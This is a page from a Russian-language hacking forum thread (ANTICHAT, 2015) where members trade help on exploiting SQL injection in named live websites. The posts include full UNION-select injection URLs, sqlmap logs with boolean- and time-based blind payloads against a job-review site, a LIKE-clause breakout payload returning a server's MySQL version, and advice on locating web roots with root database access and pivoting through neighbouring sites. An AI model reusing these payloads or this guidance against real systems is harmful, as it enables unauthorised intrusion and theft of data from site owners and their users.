HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 22.05.2015, 02:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от teh  
teh said:

Помогите с выводом
вроде все хорошо
Код:
Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,table_name+from+information_schema.tables+limit+0,1--
но как хочу достать инфу, ничего не выводить
Код:
Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,AddressInfoID+from+helpusr.addressinfo--
Код:
Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(AddressInfoID)+from+addressinfo--+
count = 0.

Код:
Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,count(username)+from+users+limit+0,1--
count = 0
 
Ответить с цитированием

  #102  
Старый 23.05.2015, 05:12
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

.SpoilerTarget" type="button">Spoiler: Сайт
Сайт: https://www.badjobs.ru/savereview/

POST:

Код:
Code:
company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1
Параметр: city_jobs
sqlmap:

Код:
Code:
---
Parameter: city_jobs (POST)
  Type: boolean-based blind
  Title: MySQL >= 5.0 boolean-based blind - Parameter replace
  Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=(SELECT (CASE WHEN (8743=8743) THEN 8743 ELSE 8743*(SELECT 8743 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: company=35135&security=f06d85943be1c7e76fa14c55f5097923&first_name=3287767&last_name=3947913&email=(не будет опубликована на сайте)&work_address=8194439&status=job&position=2095909&data_start_year=2015&data_end_year=2015&salary_start=3671772&salary_end=5211413&good=WCRTEXTAREATESTINPUT6708725&bad=WCRTEXTAREATESTINPUT9767053&data_start_month=0&data_end_month=0&perspective=1&boss=1&operating_conditions=1&soc_package=1&collective=1&city_jobs=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iqmj)
---
[06:49:55] [INFO] testing MySQL
[06:49:55] [INFO] confirming MySQL
[06:49:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
 
Ответить с цитированием

  #103  
Старый 23.05.2015, 07:27
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Не подскажите в чем может быть проблема? Никак не выводит список баз
Код:
Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: city_jobs (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: company=35135&city_jobs=(SELECT (CASE WHEN (8743=8743) THEN 8743 ELSE 8743*(SELECT 8743 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: company=35135&city_jobs=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iqmj)
---
[04:08:59] [INFO] testing MySQL
[04:08:59] [INFO] confirming MySQL
[04:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
[04:08:59] [INFO] fetching database names
[04:08:59] [INFO] fetching number of databases
[04:09:04] [INFO] retrieved:
[04:09:04] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[04:09:04] [WARNING] time-based comparison requires larger statistical model, please wait.........................
[04:09:26] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[04:09:28] [INFO] retrieved:
[04:09:28] [ERROR] unable to retrieve the number of databases
[04:09:28] [INFO] falling back to current database
[04:09:28] [INFO] fetching current database
[04:09:28] [INFO] retrieving the length of query output
[04:09:32] [INFO] retrieved:
[04:09:37] [INFO] retrieved:
[04:09:42] [INFO] retrieved:
[04:09:42] [CRITICAL] unable to retrieve the database names
так никто вам не ответит, нужно смотреть сайт
 
Ответить с цитированием

  #104  
Старый 23.05.2015, 14:27
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию

Ребята, есть сайт, в сторонних бд которого (не в текущей базе) лежат джумлы.

Как нибудь можно узнать какому сайту принадлежит база джумлы?

Например в ВП это делается 1 запросом..
 
Ответить с цитированием

  #105  
Старый 23.05.2015, 15:58
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от huntercs16  
huntercs16 said:

Ребята, есть сайт, в сторонних бд которого (не в текущей базе) лежат джумлы.
Как нибудь можно узнать какому сайту принадлежит база джумлы?
Например в ВП это делается 1 запросом..
таблицы там такой нет. максимум это поиск по контенту или титлу.

https://rdot.org/forum/showthread.php?t=1990
 
Ответить с цитированием

  #106  
Старый 23.05.2015, 16:24
ErrNick
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

какие есть варианты поиска абсолютного пути если имеется рутовый доступ в мускуле?

файл конфига апача не помог тк там Include /etc/apache2/sites-enabled/ а что тут хз ,пробовал site_ru.conf, site.ru.conf, site.ru,siteru.conf не нашел

перелопатил все базы в поиске пути ничего не нашел гугл тоже не помог

Debian GNU/Linux 6.0 \n \l
 
Ответить с цитированием

  #107  
Старый 23.05.2015, 16:28
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от ErrNick  
ErrNick said:

какие есть варианты поиска абсолютного пути если имеется рутовый доступ в мускуле?
файл конфига апача не помог тк там Include /etc/apache2/sites-enabled/ а что тут хз ,пробовал site_ru.conf, site.ru.conf, site.ru,siteru.conf не нашел
перелопатил все базы в поиске пути ничего не нашел гугл тоже не помог
Debian GNU/Linux 6.0 \n \l
https://rdot.org/forum/showthread.php?t=82

заодно соседей посмотрите на сайте через реверс, возможно через них получится
 
Ответить с цитированием

  #108  
Старый 24.05.2015, 17:34
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Помогите раскрутить.

.SpoilerTarget" type="button">Spoiler
http://myevent.com/1/helpcenter.htm

уязвимое поле - поиск

в итоге поулчаем запрос

http://myevent.com/submit.php

POST

searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE

searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE
 
Ответить с цитированием

  #109  
Старый 24.05.2015, 18:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Помогите раскрутить.
Spoiler
http://myevent.com/1/helpcenter.htm
уязвимое поле - поиск
в итоге поулчаем запрос
http://myevent.com/submit.php
POST
searchString=dfghdfhdfhdfh' or+1='1&componentID=search_help&submitted=1 - TRUE
searchString=dfghdfhdfhdfh' or+1='2&componentID=search_help&submitted=1 - FALSE
с sqli в поиске чаще всего встречается уязвимость в LIKE (%inj%), поэтому нужно закрыть скобку и крутить как обычно:

Код:
Code:
') union select 1,2,version(),4-- f
5.5.38-0ubuntu0.12.04.1-log
 
Ответить с цитированием

  #110  
Старый 25.05.2015, 10:31
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

что тут можно сделать? Вывода я так понимаю не добиться, ну хотя бы на blind раскрутить.

.SpoilerTarget" type="button">Spoiler
https://secure.androticsdirect.com/register.php?

POST

xid=8f75e2274108df112c5f2ad2d230f9bb&title=Mr.&fir stname=rwesdf&lastname=wedsa&company=&b_address=ew sfd&b_address_2=&b_city=wesdf&b_state=CA&b_country =US&b_zipcode=52323&s_address=&s_address_2='&s_cit y=&s_state=CA&s_country=US&s_zipcode=&phone=352523 523&email=asfasf'+union+select+1+--+&fax=&url=&additional_values%5B1%5D=Yes&uname=lon g33&passwd1=123123&passwd2=123123&anonymous=&usert ype=C
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ